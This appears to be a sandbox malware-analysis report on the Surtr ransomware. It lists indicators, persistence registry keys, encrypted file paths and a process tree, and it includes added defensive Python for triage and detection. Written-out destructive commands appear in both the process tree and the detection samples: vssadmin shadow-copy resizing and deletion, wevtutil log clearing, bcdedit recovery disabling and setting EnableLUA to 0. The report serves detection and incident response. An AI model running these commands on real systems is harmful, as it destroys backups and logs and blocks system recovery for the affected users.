Analysis

max time kernel: 128s
max time network: 124s
platform: windows7_x64
resource: win7-en-20211208
submitted: 24-12-2021 07:08

Static task: static1
Behavioral task: behavioral1
    Sample: surtr.exe
    Resource: win7-en-20211208
Behavioral task: behavioral2
    Sample: surtr.exe
    Resource: win10-en-20211208
General

Target: surtr.exe
Size: 320KB
MD5: e6fc190168519d6a6c4f1519e9450f0f
SHA1: af2080ddf1064fb80c7b9af942aaabf264441098
SHA256: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512: 4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
Malware Config

Extracted from C:\ProgramData\Service\SURTR_README.txt
    Contact: DecryptMyData@mailfence.com
    Contact: Decrypter@msgsafe.io
Extracted from C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
    Family: surtr
    Contact: DecryptMyData@mailfence.com
    Contact: Decrypter@msgsafe.io
Signatures

Detects Surtr Payload (2 IoCs)
    resource                                                                        yara_rule
    behavioral1/memory/956-60-0x0000000140133F50-mapping.dmp                        family_surtr
    behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp      family_surtr
Surtr
Ransomware family first seen in late 2021.
(signature name not captured in the extraction; 1 IoC)
    description      ioc                                                                                               process
    Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"      reg.exe
    Setting EnableLUA to 0 disables User Account Control; the change takes effect at the next reboot.
Clears Windows event logs (1 TTP, 64 IoCs)
    pid / process
    wevtutil.exe: 2844, 1364, 3644, 1064, 3464, 3768, 3448, 3684, 1056, 3128, 2092, 2508, 3824, 3824, 3180, 2548, 1608, 4092, 2132, 2764, 3720, 3104, 468, 1928, 852, 1016, 1676, 2468, 3964, 3640, 3200, 1860, 2040, 2056, 3676, 3384, 3852, 2188
    process name not recorded: 2748, 4080, 3484, 2940, 3252, 3504, 3836, 812, 2616, 1588, 1752, 4040, 3108, 4052, 1532, 2260, 3296, 3628, 3080, 2892, 3240, 3208, 2900, 2832, 3260, 1928
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
    pid / process: 3680 bcdedit.exe, 3760 bcdedit.exe
Blocklisted process makes network request (5 IoCs)
    flow / pid: 6 (pid 3568), 7 (pid 3568), 9 (pid 3568), 11 (pid 3568), 13 (pid 3568); process name not recorded

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)

YARA rule upx matched in memory (5 IoCs)
    resource                                                                        yara_rule
    behavioral1/memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmp      upx
    behavioral1/memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmp      upx
    behavioral1/memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmp      upx
    behavioral1/memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmp      upx
    behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp      upx
Drops startup file (7 IoCs)
    description                   ioc                                                                                                process
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt      cmd.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt      cmd.exe
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe             cmd.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe             cmd.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe             (process not recorded)
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta      cmd.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta      cmd.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 8 IoCs)
    description      ioc                                                                                                                                 process
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"                     reg.exe
    Key created      \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                          reg.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"      reg.exe
    Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce                                                                 reg.exe
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"                 reg.exe
    Key created      \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce                      reg.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"  reg.exe
    Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                                                                     reg.exe
Enumerates connected drives (3 TTPs, 49 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
    File opened (read-only) by vssadmin.exe (25 IoCs, every letter except C:): \??\A: \??\B: \??\D: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
    File opened (read-only) by surtr.exe (24 IoCs, every letter except C: and D:): \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
    description      ioc                                                                                                                                        process
    Set value (str)  \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"      surtr.exe

Suspicious use of SetThreadContext (1 IoC)
    PID 1448 (surtr.exe) set thread context of PID 956 (surtr.exe)
Drops file in Program Files directory (64 IoCs)
All 64 entries are "File opened for modification" by surtr.exe; each target already carries the appended .[DecryptMyData@mailfence.com].SURT name:
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Microsoft Games\Hearts\desktop.ini.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_pl.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS0009.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21336_.GIF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\7-Zip\License.txt.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jre7\bin\jfxmedia.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Common Files\System\msadc\msdarem.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR17F.GIF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\VideoLAN\VLC\plugins\video_filter\librotate_plugin.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jre7\lib\zi\America\Barbados.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jre7\lib\zi\Etc\UTC.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Windows Media Player\Media Renderer\RenderingControl.xml.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_hu.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.XML.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jre7\lib\security\javafx.policy.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Common Files\Microsoft Shared\ink\mshwgst.dll.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\ConvertToUnpublish.pps.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\MSPST32.DLL.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL104.XML.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\7-Zip\Lang\id.txt.[DecryptMyData@mailfence.com].SURT
    C:\Program Files\Java\jre7\lib\zi\America\Maceio.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0196400.WMF.[DecryptMyData@mailfence.com].SURT
    C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT.[DecryptMyData@mailfence.com].SURT
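Every path in that list follows one naming pattern, original name + .[contact email].SURT, and the ransom notes, the Startup-folder copies and the C:\ProgramData\Service staging directory all use fixed names as well. The Python below is an added triage example, not code from this report or from the Surtr sample: given a list of dropped or modified paths (as exported from a sandbox or an EDR file-event query), it recovers the original filename and contact address from each encrypted name, flags ransom notes, Startup-folder persistence and staging-directory drops, and summarises which directories and file types were hit. The sample list is constructed from paths that appear in this report plus one untouched system file; the generic email-in-brackets pattern is an assumption that goes slightly beyond the single .SURT case shown here.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# <original name>.[<contact email>].<marker>, e.g. nb.txt.[DecryptMyData@mailfence.com].SURT
# The bracketed-email form is generalised beyond the .SURT marker seen in this report.
ENCRYPTED_RE = re.compile(r"^(?P<orig>.+)\.\[(?P<email>[^\[\]\s]+@[^\[\]\s]+)\]\.(?P<marker>[A-Za-z0-9]+)$")
NOTE_RE = re.compile(r"^SURTR_README\.(?:txt|hta)$", re.I)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
STAGING_DIR = "c:\\programdata\\service\\"  # created by 'cmd.exe /c mkdir C:\ProgramData\Service'


def classify_path(path):
    """Classify one file path from a dropped/modified-file list."""
    p = PureWindowsPath(path)
    m = ENCRYPTED_RE.match(p.name)
    if m:
        original = p.with_name(m.group("orig"))
        return {"kind": "encrypted", "path": path, "original": str(original),
                "orig_ext": original.suffix.lower(), "email": m.group("email"),
                "marker": m.group("marker")}
    if NOTE_RE.match(p.name):
        return {"kind": "ransom-note", "path": path, "in_startup": bool(STARTUP_RE.search(path))}
    if STARTUP_RE.search(path):
        return {"kind": "startup-persistence", "path": path}
    if path.lower().startswith(STAGING_DIR):
        return {"kind": "staging", "path": path}
    return {"kind": "other", "path": path}


def scope(paths):
    """Summarise impact: file count, original extensions, top-level directories, contact addresses."""
    recs = [classify_path(p) for p in paths]
    enc = [r for r in recs if r["kind"] == "encrypted"]
    top_dirs = Counter()
    for r in enc:
        parts = PureWindowsPath(r["path"]).parts  # ('C:\\', 'Program Files', ...)
        if len(parts) >= 2:
            top_dirs[str(PureWindowsPath(*parts[:2]))] += 1
    return {
        "encrypted": len(enc),
        "emails": sorted({r["email"] for r in enc}),
        "markers": sorted({r["marker"] for r in enc}),
        "by_ext": Counter(r["orig_ext"] or "(none)" for r in enc),
        "top_dirs": top_dirs,
        "notes": [r["path"] for r in recs if r["kind"] == "ransom-note"],
        "startup_persistence": [r["path"] for r in recs if r["kind"] == "startup-persistence"],
        "staging": [r["path"] for r in recs if r["kind"] == "staging"],
    }


# Constructed sample: entries 0-10 are paths from this report, the last one is an untouched file.
SAMPLE_PATHS = [
    r"C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT",
    r"C:\Program Files\7-Zip\License.txt.[DecryptMyData@mailfence.com].SURT",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.[DecryptMyData@mailfence.com].SURT",
    r"C:\Program Files (x86)\Microsoft Office\Office14\MSPST32.DLL.[DecryptMyData@mailfence.com].SURT",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.[DecryptMyData@mailfence.com].SURT",
    r"C:\Program Files\Microsoft Games\Hearts\desktop.ini.[DecryptMyData@mailfence.com].SURT",
    r"C:\ProgramData\Service\SURTR_README.txt",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt",
    r"C:\ProgramData\Service\SurtrBackGround.jpg",
    r"C:\Windows\System32\kernel32.dll",
]

if __name__ == "__main__":
    for key, val in scope(SAMPLE_PATHS).items():
        print(f"{key}: {val}")
```

On a real case, feed scope() the full file-event export rather than this sample; a second contact address or marker in the summary means more than one build or operator touched the host, and the top_dirs counter is a quick way to see whether user data or only Program Files was reached.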
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
    pid / process: 520 (process name not recorded), 2704 schtasks.exe, 3620 schtasks.exe
Interacts with shadow copies (2 TTPs, 27 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
    vssadmin.exe PIDs: 2364, 2372, 2468, 2084, 2168, 2180, 2060, 2092, 2152, 2188, 2504, 1676, 2104, 2128, 2052, 888, 2332, 2112, 2140, 2412, 2204, 2380, 2480, 2488, 520, 1108, 2120
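The vssadmin, bcdedit and wevtutil activity recorded in the "Clears Windows event logs", "Deletes shadow copies", "Modifies boot configuration data" and "Interacts with shadow copies" signatures is the inhibit-recovery pattern (ATT&CK T1490, with T1070.001 for the log clearing): shrinking shadow storage on every drive letter with /maxsize forces Windows to discard the existing shadow copies that no longer fit, and vssadmin Delete Shadows /all /quiet removes whatever is left. The Python below is an added detection example, not code from this report or from the Surtr sample: it classifies process command lines and groups the hits by parent PID so that one parent sweeping many drives stands out. The vssadmin command lines in the sample are copied from the process tree below; the wevtutil, bcdedit and wmic forms, the "vssadmin list shadows" control line and all PIDs are constructed, because the report records only PIDs for those processes.

```python
import re
from collections import defaultdict

# Detection rules: (tag, ATT&CK technique, pattern). The wmic rule is a generalisation of the
# vssadmin behaviour in this report; the report itself does not record a wmic call.
RULES = [
    ("shadowstorage-resize", "T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b.*?/maxsize=(?P<maxsize>\S+)", re.I)),
    ("shadow-delete", "T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow-delete-wmic", "T1490",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("bcd-modify", "T1490",
     re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b", re.I)),
    ("eventlog-clear", "T1070.001",
     re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(?P<log>\S+)", re.I)),
]
DRIVE_RE = re.compile(r"/for=(?P<drive>[A-Za-z]):")
CMD_WRAPPER_RE = re.compile(r"\bcmd(?:\.exe)?\s+/c\b", re.I)


def classify(cmdline):
    """Return [(tag, technique, detail_dict)] for one process command line."""
    hits = []
    for tag, technique, pat in RULES:
        m = pat.search(cmdline)
        if not m:
            continue
        detail = {k: v for k, v in m.groupdict().items() if v}
        d = DRIVE_RE.search(cmdline)
        if d:
            detail["drive"] = d.group("drive").upper()
        hits.append((tag, technique, detail))
    # "cmd.exe /c cmd.exe /c <tool>": the double wrapper used for every vssadmin call in the tree
    if len(CMD_WRAPPER_RE.findall(cmdline)) >= 2:
        hits.append(("nested-cmd-wrapper", "T1059.003", {}))
    return hits


def summarize(events):
    """Group hits by parent PID: {ppid: {"tags": set, "drives": set}}."""
    summary = defaultdict(lambda: {"tags": set(), "drives": set()})
    for _pid, ppid, cmdline in events:
        for tag, _technique, detail in classify(cmdline):
            entry = summary[ppid]
            entry["tags"].add(tag)
            if "drive" in detail:
                entry["drives"].add(detail["drive"])
    return dict(summary)


def verdict(entry, min_drives=3):
    """'inhibit-recovery' when one parent resizes shadow storage on several drives or deletes shadows."""
    resize_sweep = "shadowstorage-resize" in entry["tags"] and len(entry["drives"]) >= min_drives
    deletes = bool({"shadow-delete", "shadow-delete-wmic"} & entry["tags"])
    return "inhibit-recovery" if resize_sweep or deletes else "none"


# Constructed (pid, ppid, cmdline) events. Command lines 1-4 are copied from the process tree in
# this report; the wevtutil, bcdedit and "list shadows" lines and all PIDs are constructed.
SAMPLE_EVENTS = [
    (468, 956, r"C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB"),
    (524, 956, r"C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB"),
    (1228, 956, r"C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB"),
    (1784, 956, r"C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet"),
    (2360, 956, r"wevtutil cl Security"),
    (3680, 956, r"bcdedit /set {default} recoveryenabled No"),
    (4000, 1200, r"vssadmin list shadows"),  # legitimate admin use: must not fire
]

if __name__ == "__main__":
    for ppid, entry in summarize(SAMPLE_EVENTS).items():
        print(ppid, verdict(entry), sorted(entry["tags"]), sorted(entry["drives"]))
```

The per-parent grouping is what separates this from a single-command signature: one vssadmin resize from a backup job is routine, the same parent issuing it for A: through Z: within seconds is not. Feed summarize() Sysmon event ID 1 or EDR process-creation records (pid, parent pid, command line) to use it outside the sample.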
(signature name not captured in the extraction; 1 IoC)
    Key created      \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main      (process not recorded)

Modifies registry class (5 IoCs)
    description      ioc                                                                                                  (process not recorded)
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\.surt
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file
    Together these register the .surt extension with a handler class whose DefaultIcon is the dropped SurtrIcon.ico, so encrypted files display the ransomware's icon in Explorer.
Opens file in notepad (likely ransom note) (1 IoC)
    pid: 3540 (process name not recorded)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
    pid / process: 956 surtr.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
    vssvc.exe (PID 2680): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
    wevtutil.exe, SeSecurityPrivilege and SeBackupPrivilege each, PIDs: 4092, 2360, 2816, 3220, 2364, 1608, 2264, 2392, 2416, 3376, 3424, 612, 1860, 1280, 2280, 1640, 1684, 3324, 3508, 3532, 3516, 3548, 3364, 3576, 3564, 3644, 3628, 3720, 3824, 3800
    wevtutil.exe (PID 3840): SeSecurityPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
    PID 1448 surtr.exe wrote to memory of PID 956 surtr.exe (7 writes)
    PID 956 surtr.exe wrote to memory of cmd.exe PIDs 468, 524, 360, 1228, 1784, 1356, 1812, 416, 1640, 1468, 1484, 1476, 1860, 1500, 1200, 1824, 992, 1736 (3 writes each)
    PID 360 cmd.exe wrote to memory of PID 736 chcp.com (3 writes)
Views/modifies file attributes (1 TTP, 8 IoCs)
    pid / process: 2372, 1640, 1828, 3476, 1924, 212 (process name not recorded); 2504 attrib.exe; 1524 attrib.exe
Processes
(tree depth is shown by indentation; each entry gives the image path, the command line, then the signatures attributed to that process)

C:\Users\Admin\AppData\Local\Temp\surtr.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\surtr.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
        - Enumerates connected drives
        - Sets desktop wallpaper using registry
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c echo off

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c chcp 437
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\chcp.com
                cmd: chcp 437

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
